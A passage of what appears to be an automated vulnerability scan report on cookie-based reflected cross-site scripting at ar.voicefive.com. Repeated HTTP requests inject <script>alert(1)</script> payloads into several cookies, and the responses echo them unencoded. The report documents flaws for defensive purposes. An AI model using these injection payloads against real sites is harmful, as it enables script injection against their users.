({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... 4:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-128892237236dc5<script>alert(1)</script>1cef8ae22e9', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_708 ...[SNIP]...
The value of the ar_70821733 cookie is copied into the HTML document as plain text between tags. The payload bc54f<script>alert(1)</script>7f3ceeb4ca0 was submitted in the ar_70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&bc54f<script>alert(1)</script>7f3ceeb4ca0; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:24 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:24 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&bc54f<script>alert(1)</script>7f3ceeb4ca0', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&' });
The value of the ar_p43112268 cookie is copied into the HTML document as plain text between tags. The payload d6675<script>alert(1)</script>095736833d1 was submitted in the ar_p43112268 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&d6675<script>alert(1)</script>095736833d1; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:27 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:27 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... u Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&d6675<script>alert(1)</script>095736833d1', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&pr ...[SNIP]...
The value of the ar_p70821733 cookie is copied into the HTML document as plain text between tags. The payload 1a3de<script>alert(1)</script>93ab378cd29 was submitted in the ar_p70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&1a3de<script>alert(1)</script>93ab378cd29; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:28 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:28 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23 ...[SNIP]... ecExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&1a3de<script>alert(1)</script>93ab378cd29', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:0 ...[SNIP]...
The value of the ar_p72213098 cookie is copied into the HTML document as plain text between tags. The payload c879d<script>alert(1)</script>13e65dbf77c was submitted in the ar_p72213098 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&c879d<script>alert(1)</script>13e65dbf77c; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:28 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:28 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&c879d<script>alert(1)</script>13e65dbf77c', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat D ...[SNIP]...
The value of the ar_p76230671 cookie is copied into the HTML document as plain text between tags. The payload 3f330<script>alert(1)</script>2a436cc7f7a was submitted in the ar_p76230671 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&3f330<script>alert(1)</script>2a436cc7f7a; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:23 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:23 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&3f330<script>alert(1)</script>2a436cc7f7a', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recEx ...[SNIP]...
The value of the ar_p76459327 cookie is copied into the HTML document as plain text between tags. The payload a6ce8<script>alert(1)</script>25bb0887bd5 was submitted in the ar_p76459327 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&a6ce8<script>alert(1)</script>25bb0887bd5; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:27 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:27 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23 ...[SNIP]... Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&a6ce8<script>alert(1)</script>25bb0887bd5', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:4 ...[SNIP]...
The value of the ar_p76910469 cookie is copied into the HTML document as plain text between tags. The payload fb924<script>alert(1)</script>7182dbda062 was submitted in the ar_p76910469 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&fb924<script>alert(1)</script>7182dbda062; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:21:20 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:20 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&fb924<script>alert(1)</script>7182dbda062', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu000033 ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload ff04f<script>alert(1)</script>c7ac47bc395 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1ff04f<script>alert(1)</script>c7ac47bc395
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:08 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1ff04f<script>alert(1)</script>c7ac47bc395', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459 ...[SNIP]...
The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 99b81<script>alert(1)</script>d14639a4c05 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=129211085999b81<script>alert(1)</script>d14639a4c05; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:05 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
